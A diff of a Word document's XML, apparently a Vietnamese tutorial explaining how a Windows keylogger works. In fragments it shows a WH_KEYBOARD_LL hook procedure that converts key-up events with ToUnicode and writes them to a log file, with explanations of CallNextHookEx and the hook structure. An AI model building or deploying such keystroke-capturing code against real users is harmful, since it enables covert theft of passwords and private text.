-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fclose(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG);</w:t>
+        <w:t xml:space="preserve">    fclose(LOG);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12151,7 +11646,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12168,16 +11662,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(nCode == HC_ACTION) &amp;&amp; ((wParam == WM_SYSKEYUP) || (wParam == WM_KEYUP))){</w:t>
+        <w:t>((nCode == HC_ACTION) &amp;&amp; ((wParam == WM_SYSKEYUP) || (wParam == WM_KEYUP))){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12197,25 +11682,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">        kbdllStruct = *((KBDLLHOOKSTRUCT</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>*)lParam</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">); </w:t>
+        <w:t xml:space="preserve">        kbdllStruct = *((KBDLLHOOKSTRUCT*)lParam); </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12273,18 +11740,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> *</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> *LOG;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12303,18 +11760,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">        LOG = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fopen(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">        LOG = fopen(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12391,7 +11838,6 @@
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12408,16 +11854,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>(</w:t>
+        <w:t>((</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12520,24 +11957,7 @@
           <w:szCs w:val="20"/>
         </w:rPr>
         <w:tab/>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t>fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12593,7 +12013,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12612,7 +12031,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12677,25 +12095,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">                </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fprintf(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>LOG,</w:t>
+        <w:t xml:space="preserve">                fprintf(LOG,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12751,7 +12151,6 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12770,7 +12169,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12809,25 +12207,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">        </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>fclose(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">LOG);  </w:t>
+        <w:t xml:space="preserve">        fclose(LOG);  </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12887,7 +12267,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -12904,16 +12283,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>hKeyHook, nCode, wParam, lParam);</w:t>
+        <w:t>(hKeyHook, nCode, wParam, lParam);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13064,25 +12434,7 @@
           <w:bCs/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">LRESULT CALLBACK </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>HookProc(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>int nCode, WPARAM wParam, LPARAM lParam)</w:t>
+        <w:t>LRESULT CALLBACK HookProc(int nCode, WPARAM wParam, LPARAM lParam)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13120,67 +12472,31 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">– nCode: giá trị giúp xác định cách xử lý thông điệp. Nếu nCode nhỏ hơn 0, hook procedure sẽ gọi </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>CallNextHookEx</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Ngược lại sẽ thực hiện các công việc xử lý trước khi gọi </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>CallNextHookEx</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>– nCode: giá trị giúp xác định cách xử lý thông điệp. Nếu nCode nhỏ hơn 0, hook procedure sẽ gọi CallNextHookEx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>()</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>. Ngược lại sẽ thực hiện các công việc xử lý trước khi gọi CallNextHookEx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13231,18 +12547,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> hook bàn phím thì wParam sẽ có giá trị của phím được nhấn, lParam sẽ chứa các thông tin về số lần nhấn, các phím tắt, trạng thái </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>phím,…</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve"> hook bàn phím thì wParam sẽ có giá trị của phím được nhấn, lParam sẽ chứa các thông tin về số lần nhấn, các phím tắt, trạng thái phím,…</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13269,25 +12575,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">xong các thủ tục sau đó rồi mới gọi hàm </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>CallNextHookEx(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>).</w:t>
+        <w:t>xong các thủ tục sau đó rồi mới gọi hàm CallNextHookEx().</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -13525,17 +12813,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">  DWORD     </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pln"/>
-          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>vkCode</w:t>
+        <w:t xml:space="preserve">  DWORD     vkCode</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13546,7 +12824,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13585,17 +12862,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">  DWORD     </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pln"/>
-          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>scanCode</w:t>
+        <w:t xml:space="preserve">  DWORD     scanCode</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13606,7 +12873,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13645,17 +12911,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">  DWORD     </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pln"/>
-          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>flags</w:t>
+        <w:t xml:space="preserve">  DWORD     flags</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13666,7 +12922,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13705,17 +12960,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">  DWORD     </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pln"/>
-          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>time</w:t>
+        <w:t xml:space="preserve">  DWORD     time</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13726,7 +12971,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13765,17 +13009,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">  ULONG_PTR </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="pln"/>
-          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>dwExtraInfo</w:t>
+        <w:t xml:space="preserve">  ULONG_PTR dwExtraInfo</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13786,7 +13020,6 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13966,43 +13199,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">hệ thống như TAB, CTRL, </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>SHIFT,...</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ta sẽ in ra chúng ngay lập tức. Đối với các phím chữ cái và số bình thường, ta sử dụng hàm </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>GetKeyboardState(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>hệ thống như TAB, CTRL, SHIFT,... ta sẽ in ra chúng ngay lập tức. Đối với các phím chữ cái và số bình thường, ta sử dụng hàm GetKeyboardState()</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14026,25 +13223,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> PBYTE lpKeyState: Mảng </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>256 byte</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> nhận dữ liệu trạng thái cho mỗi phím ảo.</w:t>
+        <w:t xml:space="preserve"> PBYTE lpKeyState: Mảng 256 byte nhận dữ liệu trạng thái cho mỗi phím ảo.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14073,7 +13252,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Hàm </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -14082,18 +13260,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>ToUnicode(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>kbdllStruct.vkCode, kbdllStruct.scanCode, (PBYTE)&amp;keyState, (LPWSTR)&amp;buffer, sizeof(buffer)/2, 0);</w:t>
+        <w:t>ToUnicode(kbdllStruct.vkCode, kbdllStruct.scanCode, (PBYTE)&amp;keyState, (LPWSTR)&amp;buffer, sizeof(buffer)/2, 0);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14323,25 +13490,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve">Cuối cùng ta cần gọi hàm </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>CallNextHookEx(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>) để gọi hook tiếp theo trong hook chain.</w:t>
+        <w:t>Cuối cùng ta cần gọi hàm CallNextHookEx() để gọi hook tiếp theo trong hook chain.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14506,7 +13655,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> WINAPI </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -14523,16 +13671,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve">HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, </w:t>
+        <w:t xml:space="preserve">(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14572,7 +13711,6 @@
         </w:rPr>
         <w:t xml:space="preserve">    hKeyHook = </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -14589,16 +13727,7 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>WH_KEYBOARD_LL, (HOOKPROC)</w:t>
+        <w:t>(WH_KEYBOARD_LL, (HOOKPROC)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14654,18 +13783,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">    MSG </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>msg;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t xml:space="preserve">    MSG msg;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14706,7 +13825,6 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -14725,7 +13843,6 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -14780,18 +13897,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(&amp;msg</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>(&amp;msg);</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14828,18 +13935,8 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>(&amp;msg</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t>);</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>(&amp;msg);</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14896,18 +13993,8 @@
